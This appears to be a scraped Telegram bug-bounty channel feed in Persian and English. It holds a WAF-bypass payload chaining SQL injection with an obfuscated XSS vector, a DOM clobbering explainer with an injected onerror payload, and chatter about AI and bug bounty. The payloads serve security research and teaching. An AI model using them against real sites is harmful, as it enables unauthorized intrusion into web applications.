❤1
چقدر چنل باگ بانتی و امنیت زیاد شده😂
به جای چنلای کصشر تلگرامی(also here) برید خارجیارو توییتر دنبال کنید
اینجا چیز خاصی پیدا نمیشه😄
به جای چنلای کصشر تلگرامی(also here) برید خارجیارو توییتر دنبال کنید
اینجا چیز خاصی پیدا نمیشه😄
👍11❤6
Interesting way to bypass WAF when you need to use the </noscript> tag:
Inspired by: https://x.com/_0x999?s=21
The WAF first checks for SQLi, so ignore the comment section.
e.g:
https://x.com/neotrony/status/1931790830336884973?s=2
Inspired by: https://x.com/_0x999?s=21
meydi" or 1=/*</noscript>*/ -- - <XSS>
The WAF first checks for SQLi, so ignore the comment section.
e.g:
meydi" or 1=/*</noscript>*/ -- - x=/*<details open=\" ontoggle=x=atob;z=x`amF2YXNjcmlwdDphbGVydChvcmlnaW4p`;location=z */>
https://x.com/neotrony/status/1931790830336884973?s=2
❤7
تا الان استوری هایی که گذاشته شده خوب بوده یا نه نظر خود را اعلام کنید 👊
Anonymous Poll
82%
عالی ادامه بدید 🦍 🤣 ….
18%
ناموسن ادامه ندید ….☺️
❤1
“bug bounty as we know it probably dies.”
Couldn’t of said it better myself tbh. Although I think we are 3-5years away from this. People doing bug bounties full time should be planning for the future (I know I am)
https://x.com/zseano/status/1932719746538996157?s=61
Couldn’t of said it better myself tbh. Although I think we are 3-5years away from this. People doing bug bounties full time should be planning for the future (I know I am)
https://x.com/zseano/status/1932719746538996157?s=61
X (formerly Twitter)
zseano (@zseano) on X
@rez0__ “bug bounty as we know it probably dies.”
Couldn’t of said it better myself tbh. Although I think we are 3-5years away from this. People doing bug bounties full time should be planning for the future (I know I am)
Couldn’t of said it better myself tbh. Although I think we are 3-5years away from this. People doing bug bounties full time should be planning for the future (I know I am)
😢4🤔3
BugBounty & Hacking Resources
چقدر از این خبر کونتون ترسید ؟🦍
my personal opinion:
این واسه همه زمینه ها برقراره و فقط باگ بانتی نیس
و به نظر من کل cyber security جز اخرین ها هستش که از بین بره
در هرصورت تو این فرصت 10x کار کنید🫦
edit:
و با زیشانو در مورد تایم موافقم😬
این واسه همه زمینه ها برقراره و فقط باگ بانتی نیس
و به نظر من کل cyber security جز اخرین ها هستش که از بین بره
در هرصورت تو این فرصت 10x کار کنید
edit:
و با زیشانو در مورد تایم موافقم
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9
This is how DOM clobbering works.
When you create an element with an id, the browser automatically creates a global variable for that ID:
Now
But when you create multiple elements with the same id:
Now
Add a name attribute:
And
Now combine that with a common JS pattern like:
This is meant to provide a fallback if the global doesn't exist. However, if
Now imagine this JS logic:
If an attacker clobbered
If HTML is set via innerHTML or similar, then this could render as:
When you create an element with an id, the browser automatically creates a global variable for that ID:
<a id="foo"></a>
Now
window.foopoints to that single element.
But when you create multiple elements with the same id:
<a id="foo"></a>
<a id="foo"></a>
Now
becomes an HTMLCollection, not a single element.
window.foo
Add a name attribute:
<a id="foo" name="bar" href="..."></a>
And
now points to that element (works in Chromium/WebKit browsers, but not Firefox).
window.foo.bar
Now combine that with a common JS pattern like:
var someObject = window.someObject || {};
This is meant to provide a fallback if the global doesn't exist. However, if
window.someObjecthas been clobbered by injected HTML, the fallback silently trusts a DOM object instead of a real JS object.
Now imagine this JS logic:
let imgSrc = someObject.avatar;
If an attacker clobbered
someObject.avatarwith:
<a id=someObject></a>
<a id=someObject name=avatar href='cid:"onerror=alert(1)//'></a>
If HTML is set via innerHTML or similar, then this could render as:
<img src="cid:" onerror="alert(1)//"">
❤7
How to survive the AI wave in #bugbounty:
- Learn to utilize AI in your hacking flow
- Don't worry too much because automated AI is never going to *fully* replace us. There are lots of programs out there which will be hard for an AI to test fully.😡 🤬
https://x.com/zseano/status/1938144252992884824?s=46
- Learn to utilize AI in your hacking flow
- Don't worry too much because automated AI is never going to *fully* replace us. There are lots of programs out there which will be hard for an AI to test fully.
https://x.com/zseano/status/1938144252992884824?s=46
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
https://nostarch.com/zero-day
این کتابو هرجور نشده تهیه کنید و بخونید
من نمیتونم اینجا چیزی بذارم یا بگم.
ولی دنبالش باشید
این کتابو هرجور نشده تهیه کنید و بخونید
من نمیتونم اینجا چیزی بذارم یا بگم.
ولی دنبالش باشید
Nostarch
From Day Zero to Zero Day
Find vulnerabilities before anyone else does.
🙏2❤1👍1